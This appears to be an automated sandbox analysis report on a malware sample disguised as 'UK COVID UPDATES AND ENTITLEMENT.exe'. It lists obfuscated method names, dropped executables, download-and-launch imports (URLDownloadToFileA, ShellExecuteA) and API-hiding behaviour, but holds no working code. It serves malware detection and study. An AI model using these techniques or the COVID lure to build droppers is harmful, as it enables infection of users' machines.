Source: 0.0.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs High entropy of concatenated method names: '.cctor', 'TdY6t5IK5Mc4Q', 'hK65SCnqm1', 'Tfe5lO1BYF', 'WfQ5LBQWgc', 'bJP5QM1519', 'XGl5819WXH', 't535jZAwjI', 'tXd5yMQqed', 'kC15VuKHBh'
Source: 0.0.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, FWysowXedcGlC7xsw8/DdMQqerdCC1uKHBh4e.cs High entropy of concatenated method names: 'UxGq2Xf85S', 'SAjqEko3mB', 'FSXqeN2cKj', '.ctor', 'QZEPIYgu3mLK6', '.cctor', 'OBMkI277SC1PCLgB71', 'DgcyhxOmSYwcQU2VWx', 'D3kJx6t22qIADH53FD', 'oPgdmdhGeJ67WJdrSg'
Source: 0.0.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, UKCRYPTED.Lists/BridgeOrderList.cs High entropy of concatenated method names: '.ctor', 'vuwW3qTka', 'oeWgHhCDa', 'C5r3Dhemg', 'xK07h1B1Q', 'juDJOq9nn', 'SkZsNtK48', 'WGvZRDFvv85ifBdlXV', 'Ty64C47LtjIbP79QHn', 'XxFH2OuwUxmcU0t1hq'
Source: 0.0.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, UKCRYPTED.Objects/ConfigurationInitializerObject.cs High entropy of concatenated method names: '.ctor', 'cn8DCltlx', 'F9VP4dCs3', 'Dispose', 'CueOFqteW', 'vQXTtwAQ5', 'xmem6gFTB', 'GLttTIXfI', 'Tla1xIYiC', 'ocjiNtwMs'
Source: 0.0.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, UKCRYPTED.Objects/Database.cs High entropy of concatenated method names: 'RestartProcess', 'T2cj09F9o', 'z26yp2wWo', 'TQNVVK8Fu', 'bZHZMDaFh', 'UGpCdZt7V', 'DEsGynkIC', 'JmkBrSm5B', 'v6hMPXHmd', 'iqHqd3DlKKl2G4t9gO'
Source: 0.0.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, fXtwAQV5gme6gFTBeL/F9V4dCys3rueFqteWh.cs High entropy of concatenated method names: 'TgQ6t5IIcpB79', '.ctor', '.cctor', 'inuu2kABFtK0ghnyINo', 'zJP6gMA2D7HZh0wOHd1', 'Ep2oYXACBA99he2ZeEN', 'a4QYbmA4d9cdllwPB4L', 'T3eOqyAJoh4KBYQtqjb', 'Nytk3wApvTD33HCsiVH', 'TNKjLUASZ2ok42ny1Js'
Source: 0.0.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, P18ALnjf71qn8Cltlx/QCkmkr8Sm5Bh6hPXHm.cs High entropy of concatenated method names: '.ctor', 'cTJnbWPpY', 'MLAYocyxW', 'qNjbOvSTg', 'johdOOb56', 'gYwIwfEhN', 'NuaxrPqRd', 'QxO6VY7xf', 'RasAjmwXW', 'qTJU5QaHr'
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs High entropy of concatenated method names: '.cctor', 'TdY6t5IK5Mc4Q', 'hK65SCnqm1', 'Tfe5lO1BYF', 'WfQ5LBQWgc', 'bJP5QM1519', 'XGl5819WXH', 't535jZAwjI', 'tXd5yMQqed', 'kC15VuKHBh'
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, FWysowXedcGlC7xsw8/DdMQqerdCC1uKHBh4e.cs High entropy of concatenated method names: 'UxGq2Xf85S', 'SAjqEko3mB', 'FSXqeN2cKj', '.ctor', 'QZEPIYgu3mLK6', '.cctor', 'OBMkI277SC1PCLgB71', 'DgcyhxOmSYwcQU2VWx', 'D3kJx6t22qIADH53FD', 'oPgdmdhGeJ67WJdrSg'
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, fXtwAQV5gme6gFTBeL/F9V4dCys3rueFqteWh.cs High entropy of concatenated method names: 'TgQ6t5IIcpB79', '.ctor', '.cctor', 'inuu2kABFtK0ghnyINo', 'zJP6gMA2D7HZh0wOHd1', 'Ep2oYXACBA99he2ZeEN', 'a4QYbmA4d9cdllwPB4L', 'T3eOqyAJoh4KBYQtqjb', 'Nytk3wApvTD33HCsiVH', 'TNKjLUASZ2ok42ny1Js'
Source: 0.2.UK COVID UPDATES AND ENTITLEMENT.exe.a30000.0.unpack, P18ALnjf71qn8Cltlx/QCkmkr8Sm5Bh6hPXHm.cs High entropy of concatenated method names: '.ctor', 'cTJnbWPpY', 'MLAYocyxW', 'qNjbOvSTg', 'johdOOb56', 'gYwIwfEhN', 'NuaxrPqRd', 'QxO6VY7xf', 'RasAjmwXW', 'qTJU5QaHr'
Source: 22.2.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs High entropy of concatenated method names: '.cctor', 'TdY6t5IK5Mc4Q', 'hK65SCnqm1', 'Tfe5lO1BYF', 'WfQ5LBQWgc', 'bJP5QM1519', 'XGl5819WXH', 't535jZAwjI', 'tXd5yMQqed', 'kC15VuKHBh'
Source: 22.2.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, FWysowXedcGlC7xsw8/DdMQqerdCC1uKHBh4e.cs High entropy of concatenated method names: 'UxGq2Xf85S', 'SAjqEko3mB', 'FSXqeN2cKj', '.ctor', 'QZEPIYgu3mLK6', '.cctor', 'OBMkI277SC1PCLgB71', 'DgcyhxOmSYwcQU2VWx', 'D3kJx6t22qIADH53FD', 'oPgdmdhGeJ67WJdrSg'
Source: 22.2.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, UKCRYPTED.Lists/BridgeOrderList.cs High entropy of concatenated method names: '.ctor', 'vuwW3qTka', 'oeWgHhCDa', 'C5r3Dhemg', 'xK07h1B1Q', 'juDJOq9nn', 'SkZsNtK48', 'WGvZRDFvv85ifBdlXV', 'Ty64C47LtjIbP79QHn', 'XxFH2OuwUxmcU0t1hq'
Source: 22.2.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, UKCRYPTED.Objects/Database.cs High entropy of concatenated method names: 'RestartProcess', 'T2cj09F9o', 'z26yp2wWo', 'TQNVVK8Fu', 'bZHZMDaFh', 'UGpCdZt7V', 'DEsGynkIC', 'JmkBrSm5B', 'v6hMPXHmd', 'iqHqd3DlKKl2G4t9gO'
Source: 22.2.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, fXtwAQV5gme6gFTBeL/F9V4dCys3rueFqteWh.cs High entropy of concatenated method names: 'TgQ6t5IIcpB79', '.ctor', '.cctor', 'inuu2kABFtK0ghnyINo', 'zJP6gMA2D7HZh0wOHd1', 'Ep2oYXACBA99he2ZeEN', 'a4QYbmA4d9cdllwPB4L', 'T3eOqyAJoh4KBYQtqjb', 'Nytk3wApvTD33HCsiVH', 'TNKjLUASZ2ok42ny1Js'
Source: 22.2.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, UKCRYPTED.Objects/ConfigurationInitializerObject.cs High entropy of concatenated method names: '.ctor', 'cn8DCltlx', 'F9VP4dCs3', 'Dispose', 'CueOFqteW', 'vQXTtwAQ5', 'xmem6gFTB', 'GLttTIXfI', 'Tla1xIYiC', 'ocjiNtwMs'
Source: 22.2.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, P18ALnjf71qn8Cltlx/QCkmkr8Sm5Bh6hPXHm.cs High entropy of concatenated method names: '.ctor', 'cTJnbWPpY', 'MLAYocyxW', 'qNjbOvSTg', 'johdOOb56', 'gYwIwfEhN', 'NuaxrPqRd', 'QxO6VY7xf', 'RasAjmwXW', 'qTJU5QaHr'
Source: 22.0.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs High entropy of concatenated method names: '.cctor', 'TdY6t5IK5Mc4Q', 'hK65SCnqm1', 'Tfe5lO1BYF', 'WfQ5LBQWgc', 'bJP5QM1519', 'XGl5819WXH', 't535jZAwjI', 'tXd5yMQqed', 'kC15VuKHBh'
Source: 22.0.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, FWysowXedcGlC7xsw8/DdMQqerdCC1uKHBh4e.cs High entropy of concatenated method names: 'UxGq2Xf85S', 'SAjqEko3mB', 'FSXqeN2cKj', '.ctor', 'QZEPIYgu3mLK6', '.cctor', 'OBMkI277SC1PCLgB71', 'DgcyhxOmSYwcQU2VWx', 'D3kJx6t22qIADH53FD', 'oPgdmdhGeJ67WJdrSg'
Source: 22.0.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, UKCRYPTED.Lists/BridgeOrderList.cs High entropy of concatenated method names: '.ctor', 'vuwW3qTka', 'oeWgHhCDa', 'C5r3Dhemg', 'xK07h1B1Q', 'juDJOq9nn', 'SkZsNtK48', 'WGvZRDFvv85ifBdlXV', 'Ty64C47LtjIbP79QHn', 'XxFH2OuwUxmcU0t1hq'
Source: 22.0.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, UKCRYPTED.Objects/Database.cs High entropy of concatenated method names: 'RestartProcess', 'T2cj09F9o', 'z26yp2wWo', 'TQNVVK8Fu', 'bZHZMDaFh', 'UGpCdZt7V', 'DEsGynkIC', 'JmkBrSm5B', 'v6hMPXHmd', 'iqHqd3DlKKl2G4t9gO'
Source: 22.0.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, UKCRYPTED.Objects/ConfigurationInitializerObject.cs High entropy of concatenated method names: '.ctor', 'cn8DCltlx', 'F9VP4dCs3', 'Dispose', 'CueOFqteW', 'vQXTtwAQ5', 'xmem6gFTB', 'GLttTIXfI', 'Tla1xIYiC', 'ocjiNtwMs'
Source: 22.0.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, fXtwAQV5gme6gFTBeL/F9V4dCys3rueFqteWh.cs High entropy of concatenated method names: 'TgQ6t5IIcpB79', '.ctor', '.cctor', 'inuu2kABFtK0ghnyINo', 'zJP6gMA2D7HZh0wOHd1', 'Ep2oYXACBA99he2ZeEN', 'a4QYbmA4d9cdllwPB4L', 'T3eOqyAJoh4KBYQtqjb', 'Nytk3wApvTD33HCsiVH', 'TNKjLUASZ2ok42ny1Js'
Source: 22.0.UK COVID UPDATES AND ENTITLEMENT.exe.180000.0.unpack, P18ALnjf71qn8Cltlx/QCkmkr8Sm5Bh6hPXHm.cs High entropy of concatenated method names: '.ctor', 'cTJnbWPpY', 'MLAYocyxW', 'qNjbOvSTg', 'johdOOb56', 'gYwIwfEhN', 'NuaxrPqRd', 'QxO6VY7xf', 'RasAjmwXW', 'qTJU5QaHr'
Source: 23.0.UK COVID UPDATES AND ENTITLEMENT.exe.220000.0.unpack, E8U7huGw3qTkaDeWHh/VtwMsbCZqk4bTIIun3.cs High entropy of concatenated method names: '.cctor', 'TdY6t5IK5Mc4Q', 'hK65SCnqm1', 'Tfe5lO1BYF', 'WfQ5LBQWgc', 'bJP5QM1519', 'XGl5819WXH', 't535jZAwjI', 'tXd5yMQqed', 'kC15VuKHBh'
Source: 23.0.UK COVID UPDATES AND ENTITLEMENT.exe.220000.0.unpack, FWysowXedcGlC7xsw8/DdMQqerdCC1uKHBh4e.cs High entropy of concatenated method names: 'UxGq2Xf85S', 'SAjqEko3mB', 'FSXqeN2cKj', '.ctor', 'QZEPIYgu3mLK6', '.cctor', 'OBMkI277SC1PCLgB71', 'DgcyhxOmSYwcQU2VWx', 'D3kJx6t22qIADH53FD', 'oPgdmdhGeJ67WJdrSg'
Source: 23.0.UK COVID UPDATES AND ENTITLEMENT.exe.220000.0.unpack, UKCRYPTED.Lists/BridgeOrderList.cs High entropy of concatenated method names: '.ctor', 'vuwW3qTka', 'oeWgHhCDa', 'C5r3Dhemg', 'xK07h1B1Q', 'juDJOq9nn', 'SkZsNtK48', 'WGvZRDFvv85ifBdlXV', 'Ty64C47LtjIbP79QHn', 'XxFH2OuwUxmcU0t1hq'
Source: 23.0.UK COVID UPDATES AND ENTITLEMENT.exe.220000.0.unpack, UKCRYPTED.Objects/ConfigurationInitializerObject.cs High entropy of concatenated method names: '.ctor', 'cn8DCltlx', 'F9VP4dCs3', 'Dispose', 'CueOFqteW', 'vQXTtwAQ5', 'xmem6gFTB', 'GLttTIXfI', 'Tla1xIYiC', 'ocjiNtwMs'
Source: 23.0.UK COVID UPDATES AND ENTITLEMENT.exe.220000.0.unpack, UKCRYPTED.Objects/Database.cs High entropy of concatenated method names: 'RestartProcess', 'T2cj09F9o', 'z26yp2wWo', 'TQNVVK8Fu', 'bZHZMDaFh', 'UGpCdZt7V', 'DEsGynkIC', 'JmkBrSm5B', 'v6hMPXHmd', 'iqHqd3DlKKl2G4t9gO'
Source: 23.0.UK COVID UPDATES AND ENTITLEMENT.exe.220000.0.unpack, fXtwAQV5gme6gFTBeL/F9V4dCys3rueFqteWh.cs High entropy of concatenated method names: 'TgQ6t5IIcpB79', '.ctor', '.cctor', 'inuu2kABFtK0ghnyINo', 'zJP6gMA2D7HZh0wOHd1', 'Ep2oYXACBA99he2ZeEN', 'a4QYbmA4d9cdllwPB4L', 'T3eOqyAJoh4KBYQtqjb', 'Nytk3wApvTD33HCsiVH', 'TNKjLUASZ2ok42ny1Js'
Source: 23.0.UK COVID UPDATES AND ENTITLEMENT.exe.220000.0.unpack, P18ALnjf71qn8Cltlx/QCkmkr8Sm5Bh6hPXHm.cs High entropy of concatenated method names: '.ctor', 'cTJnbWPpY', 'MLAYocyxW', 'qNjbOvSTg', 'johdOOb56', 'gYwIwfEhN', 'NuaxrPqRd', 'QxO6VY7xf', 'RasAjmwXW', 'qTJU5QaHr'

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe File created: C:\Users\user\AppData\Local\Temp\dwnl.exe Jump to dropped file
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe File created: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Jump to dropped file
Contains functionality to download and launch executables
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040A71E ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,FindCloseChangeNotification,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,URLDownloadToFileA,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,ShellExecuteA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@ 28_2_0040A71E

Hooking and other Techniques for Hiding and Protection:

barindex
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_00407D38 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress, 28_2_00407D38
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\UK COVID UPDATES AND ENTITLEMENT.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
